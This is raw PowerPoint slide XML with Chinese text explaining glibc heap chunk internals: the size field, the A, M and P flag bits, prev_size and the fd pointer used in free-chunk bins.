        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>虚拟内存 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mmap</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段中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>动态链接库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>仅在物理内存中装载一份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0CA4A20-AD38-4B0E-8ED2-B0EA8F0D5E43}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程虚拟地址空间</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974346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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="958917" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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8D2C6478-A061-4798-8A65-874B9BD7B065}"/>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6480000" y="2160000"/>
            <a:ext cx="4010025" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7465E100-D0E7-40A3-95CC-D79AFCF09B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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占据一字长的低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3bits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以后的地址，用于表示当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的大小（整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的大小，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231473770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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="1415965" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>A flag</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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7BF4D882-555C-49DC-B8BC-1FEEFA07C40D}"/>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6480000" y="2160000"/>
            <a:ext cx="3914775" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{378608A8-B7DA-4174-913A-62A24A132EE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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NON_MAIN_ARENA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，记录当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是否不属于主线程，</a:t>
            </a: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表示不属于，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表示属于。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="999388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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="1528175" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>M flag</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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87F59E60-D320-49FC-A8FC-9F9AC8CAC403}"/>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6480000" y="2160000"/>
            <a:ext cx="3914775" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54128C17-D399-4CCD-AAF5-BB5A8B0E230C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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IS_MAPPED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，记录当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是否是由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mmap</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分配的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411754117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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="1375889" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>P flag</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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8BEB312B-8CB1-4496-8BFE-1303AFFF709C}"/>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6480000" y="2160000"/>
            <a:ext cx="3914775" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5984AAA0-591F-475F-A31D-2AF5B66D9614}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="2454216"/>
            <a:ext cx="3667760" cy="286232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PREV_INUSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，记录前一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>块是否被分配。一般来说，堆中第一个被分配的内存块的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字段的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>位都会被设置为 </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，以便于防止访问前面的非法内存。当一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>位为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时，我们能通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>prev_size</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字段来获取上一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的大小以及地址。这也方便进行空闲 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>之间的合并。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202217382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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="2258760" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> pointer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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D3171F35-116A-4A27-B60B-B414BA670005}"/>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6480000" y="2160000"/>
            <a:ext cx="4010025" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE911DE9-12D4-4211-A642-E77398D7E20E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中指向下一个（非物理相邻）空闲的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</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2553009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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="2338910" cy="584775"/>
          </a:xfrm>
